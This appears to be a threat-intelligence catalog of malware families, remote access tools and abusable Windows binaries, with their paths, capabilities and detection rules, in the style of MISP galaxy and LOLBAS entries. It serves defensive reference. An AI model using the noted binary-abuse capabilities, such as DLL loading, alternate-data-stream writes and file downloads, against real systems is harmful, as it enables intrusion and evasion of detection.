* Elastic: [initial_access_via_explorer_suspicious_child_parent_args.toml](https://github.com/elastic/detection-rules/blob/f2bc0c685d83db7db395fc3dc4b9729759cd4329/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml)
* IOC: Multiple instances of explorer.exe, or explorer.exe using the /root command line, are suspicious.<sup>[[Explorer.exe - LOLBAS Project](/references/9ba3d54c-02d1-45bd-bfe8-939e84d9d44b)]</sup>

The tag is: misp-galaxy:software="Explorer"

Explosive

[Explosive](https://app.tidalcyber.com/software/572eec55-2855-49ac-a82e-2c21e9aca27e) is a custom-made remote access tool used by the group [Volatile Cedar](https://app.tidalcyber.com/groups/7c3ef21c-0e1c-43d5-afb0-3a07c5a66937). It was first identified in the wild in 2015.<sup>[[CheckPoint Volatile Cedar March 2015](https://app.tidalcyber.com/references/a26344a2-63ca-422e-8cf9-0cf22a5bee72)]</sup><sup>[[ClearSky Lebanese Cedar Jan 2021](https://app.tidalcyber.com/references/53944d48-caa9-4912-b42d-94a3789ed15b)]</sup>

The tag is: misp-galaxy:software="Explosive"

Extexport.exe - Associated Software

<sup>[[Extexport.exe - LOLBAS Project](/references/2aa09a10-a492-4753-bbd8-aacd31e4fee3)]</sup>

The tag is: misp-galaxy:software="Extexport.exe - Associated Software"

Extexport

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Load a DLL located in the c:\test folder with a specific name.

Author: Oddvar Moe

Paths:
* C:\Program Files\Internet Explorer\Extexport.exe
* C:\Program Files (x86)\Internet Explorer\Extexport.exe

Detection:
* Sigma: [proc_creation_win_lolbin_extexport.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml)
* IOC: Extexport.exe loads a DLL and is executed from a folder other than its original path<sup>[[Extexport.exe - LOLBAS Project](/references/2aa09a10-a492-4753-bbd8-aacd31e4fee3)]</sup>

The tag is: misp-galaxy:software="Extexport"

ExtPassword

ExtPassword is a tool used to recover passwords from Windows systems.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="ExtPassword"

Extrac32.exe - Associated Software

<sup>[[Extrac32.exe - LOLBAS Project](/references/ae632afc-336c-488e-81f6-91ffe1829595)]</sup>

The tag is: misp-galaxy:software="Extrac32.exe - Associated Software"

Extrac32

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Extract to ADS, copy or overwrite a file with Extrac32.exe

Author: Oddvar Moe

Paths:
* C:\Windows\System32\extrac32.exe
* C:\Windows\SysWOW64\extrac32.exe

Detection:
* Elastic: [defense_evasion_misc_lolbin_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml)
* Sigma: [proc_creation_win_lolbin_extrac32.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml)
* Sigma: proc_creation_win_lolbin_extrac32_ads.yml<sup>[[Extrac32.exe - LOLBAS Project](/references/ae632afc-336c-488e-81f6-91ffe1829595)]</sup>

The tag is: misp-galaxy:software="Extrac32"

FakeM

The tag is: misp-galaxy:software="FakeM"

FALLCHILL

[FALLCHILL](https://app.tidalcyber.com/software/ea47f1fd-0171-4254-8c92-92b7a5eec5e1) is a RAT that has been used by [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) malware or delivered when a victim unknowingly visits a compromised website. <sup>[[US-CERT FALLCHILL Nov 2017](https://app.tidalcyber.com/references/045e03f9-af83-4442-b69e-b80f68e570ac)]</sup>

The tag is: misp-galaxy:software="FALLCHILL"

FatDuke

The tag is: misp-galaxy:software="FatDuke"

Felismus

The tag is: misp-galaxy:software="Felismus"

GreyEnergy mini - Associated Software

The tag is: misp-galaxy:software="GreyEnergy mini - Associated Software"

FELIXROOT

[FELIXROOT](https://app.tidalcyber.com/software/4b1a07cd-4c1f-4d93-a454-07fd59b3039a) is a backdoor that has been used to target Ukrainian victims. <sup>[[FireEye FELIXROOT July 2018](https://app.tidalcyber.com/references/501057e2-9a31-46fe-aaa0-427218682153)]</sup>

The tag is: misp-galaxy:software="FELIXROOT"

Ferocious

[Ferocious](https://app.tidalcyber.com/software/3e54ba7a-fd4c-477f-9c2d-34b4f69fc091) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://app.tidalcyber.com/groups/73da066d-b25f-45ba-862b-1a69228c6baa) since at least 2021.<sup>[[Kaspersky WIRTE November 2021](https://app.tidalcyber.com/references/143b4694-024d-49a5-be3c-d9ceca7295b2)]</sup>

The tag is: misp-galaxy:software="Ferocious"

Fgdump

The tag is: misp-galaxy:software="Fgdump"

FileZilla

FileZilla is a cross-platform tool used to transfer files over the File Transfer Protocol (FTP) to a site, server, or host.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="FileZilla"

Final1stspy

The tag is: misp-galaxy:software="Final1stspy"

Findstr.exe - Associated Software

<sup>[[Findstr.exe - LOLBAS Project](/references/fc4b7b28-ac74-4a8f-a39d-ce55df5fca08)]</sup>

The tag is: misp-galaxy:software="Findstr.exe - Associated Software"

Findstr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Write to ADS, discover, or download files with Findstr.exe

Author: Oddvar Moe

Paths:
* C:\Windows\System32\findstr.exe
* C:\Windows\SysWOW64\findstr.exe

Detection:
* Sigma: proc_creation_win_lolbin_findstr.yml<sup>[[Findstr.exe - LOLBAS Project](/references/fc4b7b28-ac74-4a8f-a39d-ce55df5fca08)]</sup>

The tag is: misp-galaxy:software="Findstr"

FinSpy - Associated Software

The tag is: misp-galaxy:software="FinSpy - Associated Software"

FinFisher

[FinFisher](https://app.tidalcyber.com/software/41f54ce1-842c-428a-977f-518a5b63b4d7) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://app.tidalcyber.com/software/3e70078f-407e-4b03-b604-bdc05b372f37). <sup>[[FinFisher Citation](https://app.tidalcyber.com/references/6ef0b8d8-ba98-49ce-807d-5a85d111b027)]</sup> <sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup> <sup>[[FireEye FinSpy Sept 2017](https://app.tidalcyber.com/references/142cf7a3-2ca2-4cf3-b95a-9f4b3bc1cdce)]</sup> <sup>[[Securelist BlackOasis Oct 2017](https://app.tidalcyber.com/references/66121c37-6b66-4ab2-9f63-1adb80dcec62)]</sup> <sup>[[Microsoft FinFisher March 2018](https://app.tidalcyber.com/references/88c97a9a-ef14-4695-bde0-9de2b5f5343b)]</sup>

The tag is: misp-galaxy:software="FinFisher"

Finger.exe - Associated Software

<sup>[[Finger.exe - LOLBAS Project](/references/e32d01eb-d904-43dc-a7e2-bdcf42f3ebb2)]</sup>

The tag is: misp-galaxy:software="Finger.exe - Associated Software"

Finger

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon

Author: Ruben Revuelta

Paths:
* c:\windows\system32\finger.exe
* c:\windows\syswow64\finger.exe

Detection:
* Sigma: [proc_creation_win_finger_usage.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml)
* IOC: finger.exe should not be run on a normal workstation.
* IOC: finger.exe connecting to external resources.<sup>[[Finger.exe - LOLBAS Project](/references/e32d01eb-d904-43dc-a7e2-bdcf42f3ebb2)]</sup>

The tag is: misp-galaxy:software="Finger"

FIVEHANDS

[FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) is a customized version of [DEATHRANSOM](https://app.tidalcyber.com/software/832f5ab1-1267-40c9-84ef-f32d6373be4e) ransomware written in C++. [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with SombRAT.<sup>[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]</sup><sup>[[NCC Group Fivehands June 2021](https://app.tidalcyber.com/references/33955c35-e8cd-4486-b1ab-6f992319c81c)]</sup>

The tag is: misp-galaxy:software="FIVEHANDS"

Flagpro

[Flagpro](https://app.tidalcyber.com/software/977aaf8a-2216-40f0-8682-61dd91638147) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.<sup>[[NTT Security Flagpro new December 2021](https://app.tidalcyber.com/references/c0f523fa-7f3b-4c85-b48f-19ae770e9f3b)]</sup>

The tag is: misp-galaxy:software="Flagpro"

Flamer - Associated Software

The tag is: misp-galaxy:software="Flamer - Associated Software"

sKyWIper - Associated Software

The tag is: misp-galaxy:software="sKyWIper - Associated Software"

Flame

[Flame](https://app.tidalcyber.com/software/87604333-638f-4f4a-94e0-16aa825dd5b8) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. <sup>[[Kaspersky Flame](https://app.tidalcyber.com/references/6db8f76d-fe38-43b1-ad85-ad372da9c09d)]</sup>

The tag is: misp-galaxy:software="Flame"

FLASHFLOOD

[FLASHFLOOD](https://app.tidalcyber.com/software/44a5e62a-6de4-49d2-8f1b-e68ecdf9f332) is malware developed by [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) that allows propagation and exfiltration of data over removable devices. [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) may use this capability to exfiltrate data across air-gaps. <sup>[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)]</sup>

The tag is: misp-galaxy:software="FLASHFLOOD"

FlawedAmmyy

[FlawedAmmyy](https://app.tidalcyber.com/software/308dbe77-3d58-40bb-b0a5-cd00f152dc60) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://app.tidalcyber.com/software/308dbe77-3d58-40bb-b0a5-cd00f152dc60) was based on leaked source code for a version of Ammyy Admin, a remote access software.<sup>[[Proofpoint TA505 Mar 2018](https://app.tidalcyber.com/references/44e48c77-59dd-4851-8455-893513b7cf45)]</sup>

The tag is: misp-galaxy:software="FlawedAmmyy"

BARBWIRE - Associated Software

<sup>[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]</sup>

The tag is: misp-galaxy:software="BARBWIRE - Associated Software"

GraceWire - Associated Software

<sup>[[The DFIR Report Truebot June 12 2023](/references/a6311a66-bb36-4cad-a98f-2b0b89aafa3d)]</sup>

The tag is: misp-galaxy:software="GraceWire - Associated Software"

FlawedGrace

[FlawedGrace](https://app.tidalcyber.com/software/c558e948-c817-4494-a95d-ad3207f10e26) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.<sup>[[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)]</sup>

The tag is: misp-galaxy:software="FlawedGrace"

Commander - Associated Software

The tag is: misp-galaxy:software="Commander - Associated Software"

FleetDeck

FleetDeck is a commercial remote monitoring and management (RMM) tool that enables remote desktop access and “virtual terminal” capabilities. Government and commercial reports indicate that financially motivated adversaries, including BlackCat (AKA ALPHV or Noberus) actors and Scattered Spider (AKA 0ktapus or UNC3944), have used FleetDeck for command and control and persistence purposes during intrusions.<sup>[[Cyber Centre ALPHV/BlackCat July 25 2023](/references/610c8f22-1a96-42d2-934d-8467d136eed2)]</sup><sup>[[CrowdStrike Scattered Spider SIM Swapping December 22 2022](/references/e48760ba-2752-4d30-8f99-152c81f63017)]</sup>

The tag is: misp-galaxy:software="FleetDeck"

FLIPSIDE

[FLIPSIDE](https://app.tidalcyber.com/software/18002747-ddcc-42c1-b0ca-1e598a9f1919) is a simple tool similar to Plink that is used by [FIN5](https://app.tidalcyber.com/groups/7902f5cc-d6a5-4a57-8d54-4c75e0c58b83) to maintain access to victims. <sup>[[Mandiant FIN5 GrrCON Oct 2016](https://app.tidalcyber.com/references/2bd39baf-4223-4344-ba93-98aa8453dc11)]</sup>

The tag is: misp-galaxy:software="FLIPSIDE"

fltMC.exe - Associated Software

<sup>[[fltMC.exe - LOLBAS Project](/references/cf9b4bd3-92f0-405b-85e7-95e65d548b79)]</sup>

The tag is: misp-galaxy:software="fltMC.exe - Associated Software"

fltMC

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Filter Manager Control Program used by Windows

Author: John Lambert

Paths:
* C:\Windows\System32\fltMC.exe

Detection:
* Sigma: [proc_creation_win_fltmc_unload_driver_sysmon.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml)
* Elastic: [defense_evasion_via_filter_manager.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml)
* Splunk: [unload_sysmon_filter_driver.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml)
* IOC: 4688 events with fltMC.exe<sup>[[fltMC.exe - LOLBAS Project](/references/cf9b4bd3-92f0-405b-85e7-95e65d548b79)]</sup>

The tag is: misp-galaxy:software="fltMC"

FoggyWeb

[FoggyWeb](https://app.tidalcyber.com/software/bc11844e-0348-4eed-a48a-0554d68db38c) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least early April 2021.<sup>[[MSTIC FoggyWeb September 2021](https://app.tidalcyber.com/references/1ef61100-c5e7-4725-8456-e508c5f6d68a)]</sup>

The tag is: misp-galaxy:software="FoggyWeb"

Forfiles.exe - Associated Software

The tag is: misp-galaxy:software="Forfiles.exe - Associated Software"

Forfiles

[Forfiles](https://app.tidalcyber.com/software/c6dc67a6-587d-4700-a7de-bee043a0031a) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. <sup>[[Microsoft Forfiles Aug 2016](https://app.tidalcyber.com/references/fd7eaa47-3512-4dbd-b881-bc679d06cd1b)]</sup>

The tag is: misp-galaxy:software="Forfiles"

Trinity - Associated Software

<sup>[[SentinelOne FrameworkPOS September 2019](https://app.tidalcyber.com/references/054d7827-3d0c-40a7-b2a0-1428ad7729ea)]</sup>

The tag is: misp-galaxy:software="Trinity - Associated Software"

FrameworkPOS

[FrameworkPOS](https://app.tidalcyber.com/software/aef7cbbc-5163-419c-8e4b-3f73bed50474) is a point of sale (POS) malware used by [FIN6](https://app.tidalcyber.com/groups/fcaadc12-7c17-4946-a9dc-976ed610854c) to steal payment card data from systems that run physical POS devices.<sup>[[SentinelOne FrameworkPOS September 2019](https://app.tidalcyber.com/references/054d7827-3d0c-40a7-b2a0-1428ad7729ea)]</sup>

The tag is: misp-galaxy:software="FrameworkPOS"

FreeFileSync

FreeFileSync is a tool used to facilitate cloud-based file synchronization.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="FreeFileSync"

FruitFly

FruitFly is designed to spy on Mac users.<sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup>

The tag is: misp-galaxy:software="FruitFly"

Fsi.exe - Associated Software

<sup>[[Fsi.exe - LOLBAS Project](/references/4e14e87f-2ad9-4959-8cb2-8585b67931c0)]</sup>

The tag is: misp-galaxy:software="Fsi.exe - Associated Software"

Fsi

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.

Author: Jimmy (@bohops)

Paths:
* C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe
* C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe

The tag is: misp-galaxy:software="Fsi"

FsiAnyCpu.exe - Associated Software

<sup>[[FsiAnyCpu.exe - LOLBAS Project](/references/87031d31-b6d7-4860-b11b-5a0dc8774d92)]</sup>

The tag is: misp-galaxy:software="FsiAnyCpu.exe - Associated Software"

FsiAnyCpu

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio.

Author: Jimmy (@bohops)

Paths:
* c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe

Detection:
* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)
* IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
* Sigma: proc_creation_win_lolbin_fsharp_interpreters.yml<sup>[[FsiAnyCpu.exe - LOLBAS Project](/references/87031d31-b6d7-4860-b11b-5a0dc8774d92)]</sup>

The tag is: misp-galaxy:software="FsiAnyCpu"

Fsutil.exe - Associated Software

<sup>[[Fsutil.exe - LOLBAS Project](/references/e2305dac-4245-4fac-8813-69cb210e9cd3)]</sup>

The tag is: misp-galaxy:software="Fsutil.exe - Associated Software"

Fsutil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: File System Utility

Author: Elliot Killick

Paths:
* C:\Windows\System32\fsutil.exe
* C:\Windows\SysWOW64\fsutil.exe

Detection:
* IOC: fsutil.exe should not be run on a normal workstation
* IOC: file setZeroData (not case-sensitive) in the process arguments
* IOC: Sysmon Event ID 1
* IOC: Execution of process fsutil.exe with trace decode could be suspicious
* IOC: Non-Windows netsh.exe execution
* Sigma: proc_creation_win_susp_fsutil_usage.yml<sup>[[Fsutil.exe - LOLBAS Project](/references/e2305dac-4245-4fac-8813-69cb210e9cd3)]</sup>

The tag is: misp-galaxy:software="Fsutil"

ftp.exe - Associated Software

The tag is: misp-galaxy:software="ftp.exe - Associated Software"

ftp

[ftp](https://app.tidalcyber.com/software/062deac9-8f05-44e2-b347-96b59ba166ca) is a utility commonly available with operating systems to transfer information over the File Transfer Protocol (FTP). Adversaries can use it to transfer other tools onto a system or to exfiltrate data.<sup>[[Microsoft FTP](https://app.tidalcyber.com/references/970f8d16-f5b7-44e2-b81f-738b931c60d9)]</sup><sup>[[Linux FTP](https://app.tidalcyber.com/references/021ea6bc-abff-48de-a6bb-315dbbfa6147)]</sup>

The tag is: misp-galaxy:software="ftp"

FunnyDream

[FunnyDream](https://app.tidalcyber.com/software/d0490e1d-8287-44d3-8342-944d1203b237) is a backdoor with multiple components that was used during the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign since at least 2019, primarily for execution and exfiltration.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup>

The tag is: misp-galaxy:software="FunnyDream"

DILLJUICE stage2 - Associated Software

The tag is: misp-galaxy:software="DILLJUICE stage2 - Associated Software"

Fysbis

The tag is: misp-galaxy:software="Fysbis"

WhiteBear - Associated Software

The term WhiteBear is used both for the activity group (a subset of G0010) as well as the malware observed. Based on similarities in behavior and C2, WhiteBear is assessed to be the same as S0168. <sup>[[Securelist WhiteBear Aug 2017](https://app.tidalcyber.com/references/44626060-3d9b-480e-b4ea-7dac27878e5e)]</sup><sup>[[ESET Crutch December 2020](https://app.tidalcyber.com/references/8b2f40f5-7dca-4edf-8314-a8f5bc4831b8)]</sup>

The tag is: misp-galaxy:software="WhiteBear - Associated Software"

Gelsevirine - Associated Software

The tag is: misp-galaxy:software="Gelsevirine - Associated Software"

Gelsenicine - Associated Software

The tag is: misp-galaxy:software="Gelsenicine - Associated Software"

Gelsemine - Associated Software

The tag is: misp-galaxy:software="Gelsemine - Associated Software"

Gelsemium

[Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://app.tidalcyber.com/software/9a117508-1d22-4fea-aa65-db670c13a5c9) has been used by the Gelsemium group since at least 2014.<sup>[[ESET Gelsemium June 2021](https://app.tidalcyber.com/references/ea28cf8c-8c92-48cb-b499-ffb7ff0e3cf5)]</sup>

The tag is: misp-galaxy:software="Gelsemium"

GeminiDuke

The tag is: misp-galaxy:software="GeminiDuke"

GfxDownloadWrapper.exe - Associated Software

<sup>[[GfxDownloadWrapper.exe - LOLBAS Project](/references/5d97b7d7-428e-4408-a4d3-00f52cf4bf15)]</sup>

The tag is: misp-galaxy:software="GfxDownloadWrapper.exe - Associated Software"

GfxDownloadWrapper

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.

Author: Jesus Galvez

Paths:
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\ * 
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\ * c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\ * 
c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\ * c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\ * c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\ * c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\ * c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\ * c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\ * c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\ * c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\ * c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\ * c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\ * c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\ * c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\ * c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\ * c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\ * c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\ * c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\ * c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\ * c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\ * c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\ * 